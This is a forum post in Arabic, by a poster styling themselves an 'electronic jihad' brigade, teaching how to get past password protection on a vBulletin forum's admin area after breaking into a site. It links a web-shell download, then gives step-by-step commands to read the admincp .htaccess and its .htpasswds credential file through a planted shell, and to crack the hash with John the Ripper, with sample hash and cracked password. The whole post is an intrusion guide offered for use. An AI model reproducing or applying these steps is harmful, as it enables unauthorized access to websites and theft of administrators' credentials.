Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: تخطي الفايرول في المواقع والمنتديات


سريه سفيان بن عوف الغامدي للجهاد الكتروني

Status: Offline
Posts: 632
Date:
تخطي الفايرول في المواقع والمنتديات
Permalink   
 





بسم الله الرحمن الرحيم



البعض منا حين يقوم باختراق موقع معين او منتدى يجد مايسمى بالجدار النارى على مكان ما من الموقع او المنتدى
ولكن يمكن ان يكون الحل امام عينه ولكنه يتجاهلة لانه يعتقد ان الامر صعب

اقول لك لا *-* ما فيش اكل من غير نار *.*
والبعض يقول انا ابعد ولكن اليوم ساعطيك باذن الله الحل الاكيد لهذة المشكلة (( والله ما انا شايف مشكلة ))
وعلى راى المثل (( الى يعطينى سمكة يشبعنى يوم والى يعلمنى الصيد يشبعنى كل يوم ))

المهم ندخل فى الموضوع

الاول حمل الشيل
www.xhackersx.net/pro/root.zip

لو فرضنا انك عندك شيل على اى مكان بالموقع مثلا www.example.com/shell.php

وانت فاتح الشيل ومكانك بالشيل او مكان تواجد الشيل بالمسار هو

/home/xpample/public_html/

طيب انت دلوقتى داخل الشيل اية الى هتعملة

تروح وتدخل على مسار المنتدى ( مجلد المنتدى) وهيكون مسار المنتدى بهذا الشكل (( على افتراض انك وجدت المنتدى اسمو vb ))
/home/example/public_html/vb/

وبعدها تنتقل الى مجلد الادمن الموجود في مجلد الـ vb وهيكون مسار المنتدى بالشكل

/home/example/public_html/vb/admincp/


1. طبق الأمر التالي لعرض محتوى ملف .htaccess

والامر هيكون كدة

cat /home/example/public_html/vb/admincp/.htaccess


طبعا بعد تنفيذ الامر ستنتج لك النتيجة وهتكون

AuthType Basic

AuthName "Restricted Area"

AuthUserFile "/home/example/.htpasswds/vb/admincp/passwd"


require valid-user

============

الي نحتاجة من الملف هو محتوى سطر AuthUserFile

في هذا السطر.. نأخذ مابعد كلمة AuthUserFile والذي بين النقطتين الي بالشكل هذا " "


في مثالنا هيكون بالشكل هذا:
/home/example/.htpasswds/vb/admincp/passwd

2. قم بتطبيق الأمر التالي:
cat /home/example/.htpasswds/vb/admincp/passwd


الناتج راح يكون مشابهاً لـ:

celever QzYf14eDzGTZXhVU


3. افتح المفكرة Notepad .. واكتب ماحصلنا عليه في الخطوة رقم (2) واحفظه في ملف في قرص c وهيكون على الامتداد اى داخل السى مباشرة (( داخل جهازك )) C : passwd.txt

4.يشترط وجود برنامج الجوهن بجهازك john the ripper .
لنفرض أنك فكيت ضغط البرنامج في C:
سيكون هناك مجلد اسمه john-16 وداخله مجلد run
نفتح الدوس (Start->run: cmd) للنظام xp
(Start->run: Command) للنظام 98
وننفذ الامر
cd john-16run
ونضغط انتر.. ثم ننفذ الأمر التالي:
john C: passwd.txt
تطلع لنا رسالة كـ:
Loaded 1 password (Standard DES [24/32 4K])

ننتظر إلى أن ينتهي من فك كلمة المرور.. اذا تم فكها سوف يعطينا رسالة مشابهة لـ:
((clever turkey1 ))
guesses: 1 time: 0:00:00:00 100% c/s: 512 trying: goober - braves

نعرف أنه قد خمن كلمة المرور وفكها.. كلمة المرور في المثال هي turkey1
اسم المستخدم: clever
وكلمة المرور: turkey1

وبكدة انت معاك اليوزر والباس الخاصيين بالجدار النارى
والان لديك تصريح الدخول >>>> اتفضل مستنى اية



__________________
Page 1 of 1  sorted by
 Add/remove tags to this thread
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard